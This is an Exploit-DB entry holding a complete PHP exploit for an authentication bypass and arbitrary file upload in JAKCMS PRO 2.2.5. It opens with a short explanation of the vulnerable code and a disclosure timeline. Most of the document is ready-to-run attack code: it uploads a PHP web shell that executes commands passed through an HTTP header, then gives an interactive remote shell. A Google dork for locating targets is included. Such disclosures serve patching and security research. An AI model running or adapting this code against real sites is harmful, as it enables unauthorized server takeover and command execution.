JAKCMS PRO 2.2.5 - Arbitrary File Upload

EDB-ID:

17882

CVE:



Author:

EgiX

Type:

webapps


Platform:

PHP

Date:

2011-09-22


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit
# Google Dork: "Powered By JAKCMS"
# Date: 21/09/2011
# Author: EgiX
# Software Link: http://www.jakcms.com/
# Version: 2.2.5
# Tested on: Windows 7 and Debian 6.0.2

<?php



/*

    --------------------------------------------------------

    JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit

    --------------------------------------------------------

    

    author..........: EgiX

    mail............: n0b0d13s[at]gmail[dot]com

    software link...: http://www.jakcms.com/

    

    This PoC was written for educational purpose. Use it at your own risk.

    Author will be not responsible for any damage.

    

    [-] vulnerable code in /js/editor/plugins/jakadminexplorer/php/session.php

    

    119.    if ($SESSION["check_session_variable"] != "") {

    120.    

    121.        // Session Starten

    122.        session_start();

    123.    

    124.        // Session-Variable überprüfen

    125.        if (!isset($_SESSION[$SESSION["check_session_variable"]])) {

    126.            include("error.php");

    127.            die;

    128.        }

    129.    }

    

    This authentication schema could be bypassed due to an attacker might be able to start a session accessing to /index.php that set

    for e.g. the "jak_lastURL" session variable, so could be set $SESSION["check_session_variable"] to bypass the check at line 125.

    Successful exploitation allows attackers access to plugins functionality (see /js/editor/plugins/jakadminexplorer/php/action.php),

    in this way an attacker could be able to "delete", "create", "rename" any folder/file into webserver or upload arbitrary files.

    The same vulnerability afflicts also jakadminimage, jakusrexplorer and jakusrimage plugins. 

    

    [-] Disclosure timeline:

    

    [15/09/2011] - Vulnerability discovered

    [16/09/2011] - Issue reported to http://www.jakcms.com/tracker/t/61/security-flaw-imagefilemanager

    [16/09/2011] - Vendor fix released in version 2.2.6

    [21/09/2011] - Public disclosure

    

*/



error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);



function http_send($host, $packet)

{

    if (!($sock = fsockopen($host, 80)))

        die("\n[-] No response from {$host}:80\n");

 

    fputs($sock, $packet);

    return stream_get_contents($sock);

}



function RC4($data)

{

    $key = "asvKHQFkoobdwdin4bi30xzb003ufkxS3Fu3HArhBnlIk5pr3D6OGSKvUbso1rtne42VekxwUmOtPgmcA1iYC6lrpWP7HXq6VdB8EnbzR0L8rIHMqSY8mIi0o3ROzZWe";

    $s = range(0, 256);

    $j = 0;



    for ($i = 0; $i < 256; $i++)

    {

        $j = ($j + $s[$i] + ord($key[$i % strlen($key)])) % 256;

        $x = $s[$i];

        $s[$i] = $s[$j];

        $s[$j] = $x;

    }

    

    $i = $j = 0;

    $ct = "";

    

    for ($y = 0; $y < strlen($data); $y++)

    {

        $i = ($i + 1) % 256;

        $j = ($j + $s[$i]) % 256;

        $x = $s[$i];

        $s[$i] = $s[$j];

        $s[$j] = $x;

        $ct .= $data[$y] ^ chr($s[($s[$i] + $s[$j]) % 256]);

    }

    

    return $ct;

}



print "\n+------------------------------------------------------------------+";

print "\n| JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit by EgiX |";

print "\n+------------------------------------------------------------------+\n";

 

if ($argc < 3)

{

    print "\nUsage......: php $argv[0] <host> <path>\n";

    print "\nExample....: php $argv[0] localhost /";

    print "\nExample....: php $argv[0] localhost /jakcms/\n";

    die();

}



$host = $argv[1];

$path = $argv[2];



$packet  = "GET {$path} HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Connection: close\r\n\r\n";



preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);

$sid = $m[1];



$payload  = "--o0oOo0o\r\n";

$payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n";

$payload .= "--o0oOo0o\r\n";

$payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n";

$payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";

$payload .= "--o0oOo0o--\r\n";



$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));



$packet  = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cookie: PHPSESSID={$sid}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";

$packet .= "Connection: close\r\n\r\n";

$packet .= $payload;



if (preg_match("/Error/", http_send($host, $packet))) die("\n[-] Upload failed!\n");



$packet  = "GET {$path}cache/sh.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cmd: %s\r\n";

$packet .= "Connection: close\r\n\r\n";

    

while(1)

{

    print "\njakcms-shell# ";

    if (($cmd = trim(fgets(STDIN))) == "exit") break;

    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");

}



?>